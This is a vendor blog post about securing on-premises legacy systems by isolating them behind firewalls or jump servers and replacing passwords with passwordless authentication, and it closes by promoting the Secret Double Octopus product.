Securing Legacy Systems with Passwordless Authentication

Raz Rafaeli | July 14, 2021

Robust, old, and essential — legacy systems are impossible to avoid. Whether they are COBOL-based banking applications or retail software used in old sales terminals, on-premises legacy systems are both a crucial part of countless enterprise IT operations and a significant cybersecurity weakness.

The size and age of on-premises legacy systems make them hard to patch and update. Moreover, their inherent vulnerability to modern cyber threats means that they’re the perfect gateway for hackers. The Kroger Company found this out in February when they became the latest victim to suffer a data breach due to exploits within an outdated Accellion File Transfer Appliance (FTA).

Most companies and government institutions have thought about migrating legacy systems to more modern cloud services. Nevertheless, because certain code types can only run in outdated systems (COBOL alone has over 220 billion lines of code), replacing them is prohibitively expensive and frequently delayed.

However, legacy systems can still play a valuable role — at least until a better solution is implemented — and be run securely so long as companies take a proactive approach to understand and overcome their security shortcomings. 

On-Site Legacy Systems Should Be Isolated 

Although legacy systems can be hardened by disabling unnecessary services and adding security measures in place, they will always represent a security risk. As such, companies that rely on outdated legacy systems should remove them from their corporate network and silo them within more isolated locations where access control is more manageable.

A good way to ensure that legacy systems aren’t directly accessible from the web is to put them behind a router, firewall, or jump server.

Firewalls that come with Deep Packet Inspection features are well-suited for this task because they inspect the entirety of the message instead of just the packet headers. However, jump servers take this functionality even further as they can enhance the legacy system’s native security controls with more modern technologies such as Advanced Endpoint Protection (AEP) and multi-factor authentication.

Compromised Passwords Cause Most Data Breaches on Legacy Systems

The most pressing security issue involving legacy systems is ultimately authentication. Almost every on-site legacy system requires users to log in using a password or a legacy two-factor authentication method such as a physical token, card, or USB dongle. However, these methods are fragile and easily compromised if a worker loses his card or token.

Seeing how as many as 80% of data breaches happen due to compromised passwords, legacy systems’ overreliance on password-based authentication is a serious security issue for companies. As a result, the last thing any organization should do is trust their employees to manage their passwords. When users are left to manage their own passwords, they are likely to put their convenience, i.e., storing passwords on Dropbox, spreadsheets, or using easy-to-remember passwords like 12345, before the safety of their company’s data.

According to Panda Security, 52% of people either reuse the same password or use very similar ones across multiple accounts. Shockingly, almost half of all employees are likely to keep using the same password even after being hacked.

Passwordless Authentication Makes Multiple Logins Unnecessary

Older systems typically use client/server protocols like RADIUS to manage user authentication. The problem with these methods is that while they use the MD5 hashing algorithm and a shared secret to obfuscate user passwords, they are challenging to manage and only provide limited protection to a user’s credentials — for example, RADIUS leaves tunnel-group IDs unprotected.

Passwordless authentication does away with this problem by taking passwords out of the equation. With a passwordless SSO solution like Secret Double Octopus, instead of submitting a shared secret every time they log in, users only have to authenticate the first time they enter the system. Rather than entering a password, a user can verify their identity by submitting a unique authentication factor which can be something they own (like a mobile device) or a biometric signature (such as a retinal scan).

Passwordless and multi-factor authentication (MFA) are often conflated. But while MFA is an extra layer that protects a password system, passwordless authentication’s single login makes it more user-friendly.

Secret Double Octopus Secures Legacy System Authentication

Despite their age, on-premises legacy systems will keep playing a pivotal role in many industries for many years to come. As long as company managers invest in securing them, they’ll remain a valuable network asset instead of becoming a potential data breach that is waiting to blow up in their faces.

Fully compatible with on-premises Active Directory (AD) and all other IdPs, cloud services, and legacy systems, Secret Double Octopus allows modern enterprises to continue operating vital legacy systems without compromising their cybersecurity. By removing the need for passwords, our technology mitigates the most vulnerable aspect of running enterprise systems — user access.